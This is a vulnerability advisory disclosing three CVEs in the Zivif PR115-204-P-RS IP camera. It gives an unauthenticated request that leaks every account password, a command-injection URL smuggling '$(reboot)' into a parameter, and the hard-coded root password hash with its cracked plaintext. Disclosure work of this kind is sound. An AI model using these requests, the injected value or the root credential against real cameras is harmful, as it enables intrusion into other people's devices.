Zivif PR115-204-P-RS 2.3.4.2103 Bypass / Command Injection / Hardcoded Password

`Attack vector: Remote  
Authentication: None  
Researcher: Silas Cutler `p1nk` <[email protected]>  
Release date: December 10, 2017  
Full Disclosure: 90 days  
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107  
Vulnerable Device: Zivif PR115-204-P-RS  
Version: V2.3.4.2103  
  
  
Timeline:  
1 September 2017: Initial alerting to Zivif  
1 September 2017: Zivif contact established.  
3 September 2017: Details provided.  
7 September 2017: Confirmation of vulnerabilities from Zivif  
5 December 2017: Public note on Social Media CVE-2017-17105,  
CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.  
10 December 2017: This email  
  
  
-[Overview]-  
Implementation of access controls is Zivif cameras is severely lacking.  
As a result, CGI functions can be called directly, bypassing  
authentication checks.  
  
This was first identified with the following request (CVE-2017-17106)  
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser  
Cameras respond to this with:  
  
var name0="admin"; var password0="admin"; var authLevel0="255"; var  
name1="guest"; var password1="guest"; var authLevel1="3"; var  
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";  
var password3=""; var authLevel3="3"; var name4=""; var password4="";  
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";  
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var  
password7=""; var authLevel7="3"; var name8=""; var password8=""; var  
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0  
Credentials are returned in cleartext to the requester.  
  
In exploring, unauthenticated remote command injection is possible using  
(CVE-2017-17105)  
http://<Camera  
IP>/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot)  
  
Command results are not returned, however are executed by the system.  
  
One last findings was the /etc/passwd file contains the following  
hard-coded entry (CVE-2017-17107):  
root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh  
  
The encrypted password is cat1029.  
  
(none) login: root  
Password:  
Login incorrect  
(none) login: root  
Password:  
Welcome to SONIX.  
\u@\h:\W$  
Because of the way the file system is structured, changing this password  
requires more work then running passwd.  
  
-[Note]-  
The hi3510 is shared with a couple other cameras I'm exploring. The  
motd saying /Welcome to SONIX/ has lead me to speculate parts of this  
firmware may be shared with other cameras.  
  
  
  
-Silas  
  
  
  
`